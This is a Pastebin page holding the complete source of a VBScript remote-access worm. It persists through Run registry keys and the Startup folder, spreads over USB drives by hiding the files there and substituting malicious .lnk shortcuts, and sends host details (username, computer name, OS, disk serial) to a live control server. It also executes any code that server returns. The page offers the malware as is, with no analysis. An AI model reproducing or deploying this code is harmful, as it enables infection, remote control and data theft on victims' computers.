API tools faq
paste
SecurityNajaf

#IL_Code 8920

SecurityNajaf
Jan 28th, 2014
124
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VB.NET 4.41 KB | None | 0 0
raw download clone embed print report
  1. '<[ coded bY njq8 ]>'
  2. On Error Resume Next
  3. dim sh ' shell
  4. set sh =WScript.CreateObject("WScript.Shell")
  5. dim fs ' filesystem
  6. set fs= CreateObject("Scripting.FileSystemObject")
  7. dim host
  8. host="jn.redirectme.net"
  9. dim port
  10. port=7777
  11. dim DR
  12. DR = sh.ExpandEnvironmentStrings("%temp%") & "\"
  13. dim FN
  14. FN ="Servieca.vbs"
  15. dim fh
  16. dim us
  17. us="~"
  18. ins
  19. dim spl
  20. spl="jnJnj"
  21. dim i
  22. i=0
  23. while true
  24. dim a
  25. a= split(post("ready",""),spl)
  26. select case a(0)
  27. case "exc"
  28. dim sa
  29. sa= a(1)
  30. execute sa
  31. case "uns"
  32. uns
  33. end select
  34. wscript.sleep 4000
  35. i = i + 1
  36. if i> 2 then
  37. i=0
  38. xins
  39. end if
  40. wend
  41.  
  42. function ins
  43. on error resume next
  44. us= sh.regread("HKCU\njq8")
  45. if us="~" then
  46. if lcase( mid(wscript.scriptfullname,2))=":\" &  lcase(fn) then
  47. us="y"
  48. sh.regwrite "HKCU\njq8",  us, "REG_SZ"
  49. else
  50. us="n"
  51. sh.regwrite "HKCU\njq8",  us, "REG_SZ"
  52. end if
  53. end if
  54. Err.Clear
  55. fs.CopyFile wscript.scriptfullname,dr & fn ,true
  56. set fh = fs.OpenTextFile( dr & fn, 8, false)
  57. if  Err.Number>0 then
  58. wscript.quit
  59. end if
  60. xins
  61. end function
  62.  
  63. sub xins
  64. on error resume next
  65. sh.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\" & fn,  chrw(34) & dr & fn & chrw(34), "REG_SZ"
  66. sh.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\" & fn,  chrw(34) & dr & fn & chrw(34), "REG_SZ"
  67. fs.copyfile wscript.scriptfullname,  CreateObject("Shell.Application").NameSpace(&H7).Self.Path &"\" & fn ,true
  68. for each xx in fs.Drives
  69. if xx.isready then
  70. if xx.FreeSpace >0 then
  71. if xx.drivetype=1 then
  72. if fs.fileexists(xx.path & "\" & fn) then
  73. fs.getfile(xx.path & "\"  & fn).Attributes=0
  74. end if
  75. fs.copyfile dr & fn , xx.path & "\"  & fn,true
  76. For Each x In fs.GetFolder( xx.path & "\" ).Files
  77. wscript.sleep 1
  78. if instr(x.name,".") then
  79. if lcase( Split(x.name, ".")(UBound(Split(x.name, "."))))<>"lnk" then
  80. x.Attributes = 2
  81. if ucase(x.name) <> ucase(fn) then
  82. With sh.CreateShortcut(xx.path & "\"  & x.name & ".lnk")
  83. .TargetPath = "cmd.exe"
  84. .WorkingDirectory = ""
  85. .Arguments = "/c start " & Replace(fn," ", ChrW(34) _
  86. & " " & ChrW(34)) & "&start " & replace( x.name," ", ChrW(34) & " " & ChrW(34)) & " & exit"
  87. .IconLocation = sh.regread("HKLM\SOFTWARE\Classes\" & sh.regread("HKLM\SOFTWARE\Classes\." & Split(x.name, ".")(UBound(Split(x.name, "."))) & "\") & "\DefaultIcon\")
  88. if instr( .iconlocation,",")=0 then
  89. .iconlocation = .iconlocation &",0"
  90. end if
  91. .Save()
  92. end with
  93. end if
  94. end if
  95. end if
  96. Next
  97. end if
  98. end if
  99. end if
  100. next
  101. Err.Clear
  102. end sub
  103.  
  104. function uns
  105. on error resume next
  106. fh.close
  107. sh.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\" & fn
  108. sh.RegDelete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\" & fn
  109. fs.DeleteFile dr & fn ,true
  110. fs.DeleteFile CreateObject("Shell.Application").NameSpace(&H7).Self.Path &"\" & fn ,true
  111. for each xx in fs.Drives
  112. if xx.isready then
  113. if xx.FreeSpace >0 then
  114. For Each x In fs.GetFolder( xx.path & "\").Files
  115. On Error Resume Next
  116. if instr(x.name,".") then
  117. if lcase( Split(x.name, ".")(UBound(Split(x.name, "."))))<>"lnk" then
  118. x.Attributes = 0
  119. if ucase(x.name) <> ucase(fn) then
  120. fs.deletefile(xx.path & "\" & x.name & ".lnk" )
  121. else
  122. fs.deletefile( xx.path & "\" & x.name )
  123. end if
  124. end if
  125. end if
  126. Next
  127. end if
  128. end if
  129. next
  130. wscript.quit
  131. end function
  132.  
  133. function post(cmd ,da)
  134. post=""
  135. Dim o
  136. Set o = CreateObject("MSXML2.XMLHTTP")
  137. o.open "POST","http://" & host & ":" & port &"/" & cmd, false
  138. o.setRequestHeader "User-Agent:",  inf
  139. o.send da
  140. post=o.responseText
  141. end function
  142.  
  143. dim xinf
  144. function inf
  145. on error resume next
  146. if xinf="" then
  147. dim s
  148. s="??"
  149. s = hwd
  150. inf = inf & s & "\"
  151. s="??"
  152. s= sh.ExpandEnvironmentStrings("%COMPUTERNAME%")
  153. inf = inf & s & "\"
  154. s="??"
  155. s= sh.ExpandEnvironmentStrings("%USERNAME%")
  156. inf = inf & s & "\"
  157. s="??"
  158. Set a = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
  159. Set aa = a.ExecQuery ("Select * from Win32_OperatingSystem")
  160. For Each aaa in aa
  161. s= aaa.Caption  
  162. exit for
  163. Next
  164. inf = inf & s & "\\0.3\" & us &"\" & pid  
  165. xinf=inf
  166. else
  167. inf=xinf
  168. end if
  169. end function
  170.  
  171. function HWD
  172. Set a = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
  173. Set aa = a.ExecQuery("SELECT * FROM Win32_LogicalDisk")
  174. For Each aaa In aa
  175. if aaa.VolumeSerialNumber<>"" then
  176. HWD= aaa.VolumeSerialNumber
  177. exit for
  178. end if
  179. Next
  180. end function
  181.  
  182. Function PID
  183. PID=0
  184. on error resume next
  185. PID = GetObject("winmgmts:root\cimv2").Get("Win32_" &_
  186. "Process.Handle='" & _
  187. sh.Exec("mshta.exe").ProcessID & "'").ParentProcessId
  188. End Function
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!